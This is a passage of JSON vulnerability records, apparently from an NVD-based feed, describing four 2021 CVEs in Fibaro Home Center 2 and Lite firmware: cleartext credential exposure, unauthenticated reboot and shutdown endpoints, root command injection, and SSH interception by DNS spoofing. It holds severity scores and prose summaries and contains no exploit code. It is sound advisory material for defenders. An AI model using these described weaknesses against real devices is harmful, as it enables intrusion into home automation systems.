sessions, tokens and passwords.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-19T14:15:00", "type": "cve", "title": "CVE-2021-20992", "cwe": ["CWE-319"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20992"], "modified": "2021-04-23T16:08:00", "cpe": ["cpe:/o:fibaro:home_center_lite_firmware:*", "cpe:/o:fibaro:home_center_2_firmware:*"], "id": "CVE-2021-20992", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20992", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fibaro:home_center_lite_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:o:fibaro:home_center_2_firmware:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:31:41", "description": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-19T14:15:00", "type": "cve", "title": "CVE-2021-20990", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20990"], "modified": "2021-04-23T15:34:00", "cpe": ["cpe:/o:fibaro:home_center_2_firmware:4.600", "cpe:/o:fibaro:home_center_lite_firmware:4.600"], "id": "CVE-2021-20990", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20990", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:fibaro:home_center_lite_firmware:4.600:*:*:*:*:*:*:*", "cpe:2.3:o:fibaro:home_center_2_firmware:4.600:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-26T20:10:31", "description": "In Fibaro Home Center 2 and Lite devices with firmware version 4.540 and older an authenticated user can run commands as root user using a command injection vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-19T14:15:00", "type": "cve", "title": "CVE-2021-20991", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20991"], "modified": "2022-04-26T16:03:00", "cpe": ["cpe:/o:fibaro:home_center_lite_firmware:4.540", "cpe:/o:fibaro:home_center_2_firmware:4.540"], "id": "CVE-2021-20991", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20991", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:fibaro:home_center_2_firmware:4.540:*:*:*:*:*:*:*", "cpe:2.3:o:fibaro:home_center_lite_firmware:4.540:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:31:40", "description": "Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using DNS spoofing attack and a device initiated remote port-forward channel can be used to connect to the web management interface. Knowledge of authorization credentials to the management interface is required to perform any further actions.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-19T14:15:00", "type": "cve", "title": "CVE-2021-20989", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20989"], "modified": "2021-04-23T15:25:00", "cpe": ["cpe:/o:fibaro:home_center_2_firmware:4.600", "cpe:/o:fibaro:home_center_lite_firmware:4.600"], "id": "CVE-2021-20989", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20989", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fibaro:home_center_lite_firmware:4.600:*:*:*:*:*:*:*", "cpe:2.3:o:fibaro:home_center_2_firmware:4.600:*:*:*:*:*:*:*"]}]}
Fibaro Home Center MITM / Missing Authentication / Code Execution Vulnerabilities
